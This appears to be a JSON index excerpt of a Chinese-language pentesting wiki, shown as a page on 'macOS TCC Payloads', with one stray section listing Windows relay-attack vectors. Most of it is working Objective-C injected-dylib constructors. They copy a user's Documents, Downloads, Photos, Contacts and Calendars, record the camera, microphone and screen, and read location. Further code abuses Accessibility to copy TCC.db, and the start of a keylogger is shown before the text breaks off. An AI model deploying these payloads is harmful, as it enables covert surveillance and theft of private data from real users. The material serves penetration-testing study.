桌面","id":"2712","title":"桌面"},"2713":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDocumentsFolder ObjetiveC\\nShell 将 $HOME/Documents 复制到 /tmp/documents。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Documents\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/documents\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Documents 复制到 /tmp/documents。 bash cp -r \\"$HOME/Documents\\" \\"/tmp/documents\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 文档","id":"2713","title":"文档"},"2714":{"body":"权限 : 无 TCC : kTCCServiceSystemPolicyDownloadsFolder ObjetiveC\\nShell 将 $HOME/Downloads 复制到 /tmp/downloads。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Downloads\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/downloads\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Dowloads 复制到 /tmp/downloads。 bash cp -r \\"$HOME/Downloads\\" \\"/tmp/downloads\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 下载","id":"2714","title":"下载"},"2715":{"body":"权限 : com.apple.security.personal-information.photos-library TCC : kTCCServicePhotos ObjetiveC\\nShell 复制 $HOME/Pictures/Photos Library.photoslibrary 到 /tmp/photos。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Pictures/Photos Library.photoslibrary\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/photos\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Pictures/Photos Library.photoslibrary 复制到 /tmp/photos。 bash cp -r \\"$HOME/Pictures/Photos Library.photoslibrary\\" \\"/tmp/photos\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 照片库","id":"2715","title":"照片库"},"2716":{"body":"权限 : com.apple.security.personal-information.addressbook TCC : kTCCServiceAddressBook ObjetiveC\\nShell 将 $HOME/Library/Application Support/AddressBook 复制到 /tmp/contacts。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Library/Application Support/AddressBook\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/contacts\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Library/Application Support/AddressBook 复制到 /tmp/contacts。 bash cp -r \\"$HOME/Library/Application Support/AddressBook\\" \\"/tmp/contacts\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 联系人","id":"2716","title":"联系人"},"2717":{"body":"权限 : com.apple.security.personal-information.calendars TCC : kTCCServiceCalendar ObjectiveC\\nShell 复制 $HOME/Library/Calendars 到 /tmp/calendars。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Library/Calendars/\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/calendars\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Library/Calendars 复制到 /tmp/calendars。 bash cp -r \\"$HOME/Library/Calendars\\" \\"/tmp/calendars\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 日历","id":"2717","title":"日历"},"2718":{"body":"权限 : com.apple.security.device.camera TCC : kTCCServiceCamera ObjetiveC - 录制\\nObjectiveC - Check\\nShell 录制一个3秒的视频并将其保存在 /tmp/recording.mov objectivec #import \\n#import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib\\n// Code from: https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface VideoRecorder : NSObject \\n@property (strong, nonatomic) AVCaptureSession *captureSession;\\n@property (strong, nonatomic) AVCaptureDeviceInput *videoDeviceInput;\\n@property (strong, nonatomic) AVCaptureMovieFileOutput *movieFileOutput;\\n- (void)startRecording;\\n- (void)stopRecording;\\n@end\\n@implementation VideoRecorder\\n- (instancetype)init {\\nself = [super init];\\nif (self) {\\n[self setupCaptureSession];\\n}\\nreturn self;\\n}\\n- (void)setupCaptureSession {\\nself.captureSession = [[AVCaptureSession alloc] init];\\nself.captureSession.sessionPreset = AVCaptureSessionPresetHigh;\\nAVCaptureDevice *videoDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];\\nNSError *error;\\nself.videoDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:videoDevice error:&error];\\nif (error) {\\nNSLog(@\\"Error setting up video device input: %@\\", [error localizedDescription]);\\nreturn;\\n}\\nif ([self.captureSession canAddInput:self.videoDeviceInput]) {\\n[self.captureSession addInput:self.videoDeviceInput];\\n}\\nself.movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];\\nif ([self.captureSession canAddOutput:self.movieFileOutput]) {\\n[self.captureSession addOutput:self.movieFileOutput];\\n}\\n}\\n- (void)startRecording {\\n[self.captureSession startRunning];\\nNSString *outputFilePath = @\\"/tmp/recording.mov\\";\\nNSURL *outputFileURL = [NSURL fileURLWithPath:outputFilePath];\\n[self.movieFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self];\\nNSLog(@\\"Recording started\\");\\n}\\n- (void)stopRecording {\\n[self.movieFileOutput stopRecording];\\n[self.captureSession stopRunning];\\nNSLog(@\\"Recording stopped\\");\\n}\\n#pragma mark - AVCaptureFileOutputRecordingDelegate\\n- (void)captureOutput:(AVCaptureFileOutput *)captureOutput\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording failed: %@\\", [error localizedDescription]);\\n} else {\\nNSLog(@\\"Recording finished successfully. Saved to %@\\", outputFileURL.path);\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void myconstructor(int argc, const char **argv) {\\nfreopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\nVideoRecorder *videoRecorder = [[VideoRecorder alloc] init];\\n[videoRecorder startRecording];\\n[NSThread sleepForTimeInterval:3.0];\\n[videoRecorder stopRecording];\\n[[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:3.0]];\\nfclose(stderr); // Close the file stream\\n} 检查程序是否有访问相机的权限。 objectivec #import \\n#import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib\\n// Code from https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface CameraAccessChecker : NSObject\\n+ (BOOL)hasCameraAccess;\\n@end\\n@implementation CameraAccessChecker\\n+ (BOOL)hasCameraAccess {\\nAVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeVideo];\\nif (status == AVAuthorizationStatusAuthorized) {\\nNSLog(@\\"[+] Access to camera granted.\\");\\nreturn YES;\\n} else {\\nNSLog(@\\"[-] Access to camera denied.\\");\\nreturn NO;\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void telegram(int argc, const char **argv) {\\nfreopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\n[CameraAccessChecker hasCameraAccess];\\nfclose(stderr); // Close the file stream\\n} 用相机拍照 bash ffmpeg -framerate 30 -f avfoundation -i \\"0\\" -frames:v 1 /tmp/capture.jpg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 摄像头","id":"2718","title":"摄像头"},"2719":{"body":"权限 : com.apple.security.device.audio-input TCC : kTCCServiceMicrophone ObjetiveC - 录音\\nObjectiveC - Check\\nShell 录制 5 秒音频并将其存储在 /tmp/recording.m4a objectivec #import \\n#import // Code from https://www.vicarius.io/vsociety/posts/cve-2023-26818-exploit-macos-tcc-bypass-w-telegram-part-1-2\\n// gcc -dynamiclib -framework Foundation -framework AVFoundation Micexploit.m -o Micexploit.dylib @interface AudioRecorder : NSObject @property (strong, nonatomic) AVCaptureSession *captureSession;\\n@property (strong, nonatomic) AVCaptureDeviceInput *audioDeviceInput;\\n@property (strong, nonatomic) AVCaptureMovieFileOutput *audioFileOutput; - (void)startRecording;\\n- (void)stopRecording; @end @implementation AudioRecorder - (instancetype)init {\\nself = [super init];\\nif (self) {\\n[self setupCaptureSession];\\n}\\nreturn self;\\n} - (void)setupCaptureSession {\\nself.captureSession = [[AVCaptureSession alloc] init];\\nself.captureSession.sessionPreset = AVCaptureSessionPresetHigh; AVCaptureDevice *audioDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeAudio];\\nNSError *error;\\nself.audioDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:audioDevice error:&error]; if (error) {\\nNSLog(@\\"Error setting up audio device input: %@\\", [error localizedDescription]);\\nreturn;\\n} if ([self.captureSession canAddInput:self.audioDeviceInput]) {\\n[self.captureSession addInput:self.audioDeviceInput];\\n} self.audioFileOutput = [[AVCaptureMovieFileOutput alloc] init]; if ([self.captureSession canAddOutput:self.audioFileOutput]) {\\n[self.captureSession addOutput:self.audioFileOutput];\\n}\\n} - (void)startRecording {\\n[self.captureSession startRunning];\\nNSString *outputFilePath = [NSTemporaryDirectory() stringByAppendingPathComponent:@\\"recording.m4a\\"];\\nNSURL *outputFileURL = [NSURL fileURLWithPath:outputFilePath];\\n[self.audioFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self];\\nNSLog(@\\"Recording started\\");\\n} - (void)stopRecording {\\n[self.audioFileOutput stopRecording];\\n[self.captureSession stopRunning];\\nNSLog(@\\"Recording stopped\\");\\n} #pragma mark - AVCaptureFileOutputRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)captureOutput\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording failed: %@\\", [error localizedDescription]);\\n} else {\\nNSLog(@\\"Recording finished successfully. Saved to %@\\", outputFileURL.path);\\n}\\nNSLog(@\\"Saved to %@\\", outputFileURL.path);\\n} @end __attribute__((constructor))\\nstatic void myconstructor(int argc, const char **argv) { freopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\nAudioRecorder *audioRecorder = [[AudioRecorder alloc] init]; [audioRecorder startRecording];\\n[NSThread sleepForTimeInterval:5.0];\\n[audioRecorder stopRecording]; [[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]];\\nfclose(stderr); // Close the file stream\\n} 检查应用是否有权访问麦克风。 objectivec #import \\n#import // From https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4\\n// gcc -framework Foundation -framework AVFoundation -dynamiclib MicTest.m -o MicTest.dylib @interface MicrophoneAccessChecker : NSObject\\n+ (BOOL)hasMicrophoneAccess;\\n@end\\n@implementation MicrophoneAccessChecker\\n+ (BOOL)hasMicrophoneAccess {\\nAVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeAudio];\\nif (status == AVAuthorizationStatusAuthorized) {\\nNSLog(@\\"[+] Access to microphone granted.\\");\\nreturn YES;\\n} else {\\nNSLog(@\\"[-] Access to microphone denied.\\");\\nreturn NO;\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void telegram(int argc, const char **argv) {\\n[MicrophoneAccessChecker hasMicrophoneAccess];\\n} 录制5秒音频并将其存储在/tmp/recording.wav bash # Check the microphones\\nffmpeg -f avfoundation -list_devices true -i \\"\\"\\n# Use microphone from index 1 from the previous list to record\\nffmpeg -f avfoundation -i \\":1\\" -t 5 /tmp/recording.wav","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 麦克风","id":"2719","title":"麦克风"},"272":{"body":"向量 技巧 重要性 AuthIP / IPSec 假服务器发送带有任意 SPN 的 GSS-ID 负载 ;客户端直接向您构建 AP-REQ 即使跨子网也有效;默认情况下机器凭据 DCOM / MSRPC 恶意 OXID 解析器强制客户端对任意 SPN 和端口进行身份验证 纯 本地 权限提升;绕过防火墙 AD CS Web Enroll 将机器票据中继到 HTTP/CA 并获取证书,然后 PKINIT 生成 TGT 绕过 LDAP 签名防御 Shadow Credentials 写入 msDS-KeyCredentialLink,然后使用伪造的密钥对进行 PKINIT 无需添加计算机帐户","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 值得了解的更多路径","id":"272","title":"值得了解的更多路径"},"2720":{"body":"tip 要让应用获取位置, 位置服务 (来自隐私与安全) 必须启用, 否则将无法访问。 权限 : com.apple.security.personal-information.location TCC : 在 /var/db/locationd/clients.plist 中授予 ObjectiveC\\nShell 将位置写入 /tmp/logs.txt objectivec #include \\n#include \\n#import \\n#import @interface LocationManagerDelegate : NSObject \\n@end @implementation LocationManagerDelegate - (void)locationManager:(CLLocationManager *)manager didUpdateLocations:(NSArray *)locations {\\nCLLocation *location = [locations lastObject];\\nNSLog(@\\"Current location: %@\\", location);\\nexit(0); // Exit the program after receiving the first location update\\n} - (void)locationManager:(CLLocationManager *)manager didFailWithError:(NSError *)error {\\nNSLog(@\\"Error getting location: %@\\", error);\\nexit(1); // Exit the program on error\\n} @end __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSLog(@\\"Getting location\\");\\nCLLocationManager *locationManager = [[CLLocationManager alloc] init];\\nLocationManagerDelegate *delegate = [[LocationManagerDelegate alloc] init];\\nlocationManager.delegate = delegate; [locationManager requestWhenInUseAuthorization]; // or use requestAlwaysAuthorization\\n[locationManager startUpdatingLocation]; NSRunLoop *runLoop = [NSRunLoop currentRunLoop];\\nwhile (true) {\\n[runLoop runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]];\\n} NSLog(@\\"Location completed successfully.\\");\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\n} 获取对该位置的访问权限 ???","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 位置","id":"2720","title":"位置"},"2721":{"body":"权限 : 无 TCC : kTCCServiceScreenCapture ObjectiveC\\nShell 在/tmp/screen.mov中录制主屏幕5秒 objectivec #import \\n#import // clang -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o ScreenCapture ScreenCapture.m @interface MyRecordingDelegate : NSObject \\n@end @implementation MyRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)output\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording error: %@\\", error);\\n} else {\\nNSLog(@\\"Recording finished successfully.\\");\\n}\\nexit(0);\\n} @end __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\nAVCaptureSession *captureSession = [[AVCaptureSession alloc] init];\\nAVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()];\\nif ([captureSession canAddInput:screenInput]) {\\n[captureSession addInput:screenInput];\\n} AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init];\\nif ([captureSession canAddOutput:fileOutput]) {\\n[captureSession addOutput:fileOutput];\\n} [captureSession startRunning]; MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init];\\n[fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@\\"/tmp/screen.mov\\"] recordingDelegate:delegate]; // Run the loop for 5 seconds to capture\\ndispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{\\n[fileOutput stopRecording];\\n}); CFRunLoopRun();\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\n} 记录主屏幕5秒钟 bash screencapture -V 5 /tmp/screen.mov","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 屏幕录制","id":"2721","title":"屏幕录制"},"2722":{"body":"权限 : 无 TCC : kTCCServiceAccessibility 使用 TCC 权限接受 Finder 的控制,按下回车并以此绕过 TCC 接受 TCC\\nKeylogger objectivec #import \\n#import \\n#import // clang -framework Foundation -framework ApplicationServices -framework OSAKit -o ParallelScript ParallelScript.m\\n// TODO: Improve to monitor the foreground app and press enter when TCC appears void SimulateKeyPress(CGKeyCode keyCode) {\\nCGEventRef keyDownEvent = CGEventCreateKeyboardEvent(NULL, keyCode, true);\\nCGEventRef keyUpEvent = CGEventCreateKeyboardEvent(NULL, keyCode, false);\\nCGEventPost(kCGHIDEventTap, keyDownEvent);\\nCGEventPost(kCGHIDEventTap, keyUpEvent);\\nif (keyDownEvent) CFRelease(keyDownEvent);\\nif (keyUpEvent) CFRelease(keyUpEvent);\\n} void RunAppleScript() {\\nNSLog(@\\"Starting AppleScript\\");\\nNSString *scriptSource = @\\"tell application \\\\\\"Finder\\\\\\"\\\\n\\"\\n\\"set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\\\\n\\"\\n\\"set targetFolder to POSIX file \\\\\\"/tmp\\\\\\" as alias\\\\n\\"\\n\\"duplicate file sourceFile to targetFolder with replacing\\\\n\\"\\n\\"end tell\\\\n\\"; NSDictionary *errorDict = nil;\\nNSAppleScript *appleScript = [[NSAppleScript alloc] initWithSource:scriptSource];\\n[appleScript executeAndReturnError:&errorDict]; if (errorDict) {\\nNSLog(@\\"AppleScript Error: %@\\", errorDict);\\n}\\n} int main() {\\n@autoreleasepool {\\ndispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{\\nRunAppleScript();\\n}); // Simulate pressing the Enter key every 0.1 seconds\\nNSLog(@\\"Starting key presses\\");\\nfor (int i = 0; i < 10; ++i) {\\nSimulateKeyPress((CGKeyCode)36); // Key code for Enter\\nusleep(100000); // 0.1 seconds\\n}\\n}\\nreturn 0;\\n} 将按下的键存储在 /tmp/keystrokes.txt objectivec #import \\n#import \\n#import // clang -framework Foundation -framework ApplicationServices -framework Carbon -o KeyboardMonitor KeyboardMonitor.m NSString *const kKeystrokesLogPath = @\\"/tmp/keystrokes.txt\\"; void AppendStringToFile(NSString *str, NSString *filePath) {\\nNSFileHandle *fileHandle = [NSFileHandle fileHandleForWritingAtPath:filePath];\\nif (fileHandle) {\\n[fileHandle seekToEndOfFile];\\n[fileHandle writeData:[str dataUsingEncoding:NSUTF8StringEncoding]];\\n[fileHandle closeFile];\\n} else {\\n// If the file does not exist, create it\\n[str writeToFile:filePath atomically:YES encoding:NSUTF8StringEncoding error:nil];\\n}\\n} CGEventRef KeyboardEventCallback(CGEventTapProxy proxy, CGEventType type, CGEventRef event, void *refcon) {\\nif (type == kCGEventKeyDown) {\\nCGKeyCode keyCode = (CGKeyCode)CGEventGetIntegerValueField(event, kCGKeyboardEventKeycode); NSString *keyString = nil;\\n// First, handle special non-printable keys\\nswitch (keyCode) {\\ncase kVK_Return: keyString = @\\"\\"; break;\\ncase kVK_Tab: keyString = @\\"\\"; break;\\ncase kVK_Space: keyString = @\\"\\"; break;\\ncase kVK_Delete: keyString = @\\"\\"; break;\\ncase kVK_Escape: keyString = @\\"\\"; break;\\ncase kVK_Command: keyString = @\\"\\"; break;\\ncase kVK_Shift: keyString = @\\"\\"; break;\\ncase kVK_CapsLock: keyString = @\\"\\"; break;\\ncase kVK_Option: keyString = @\\"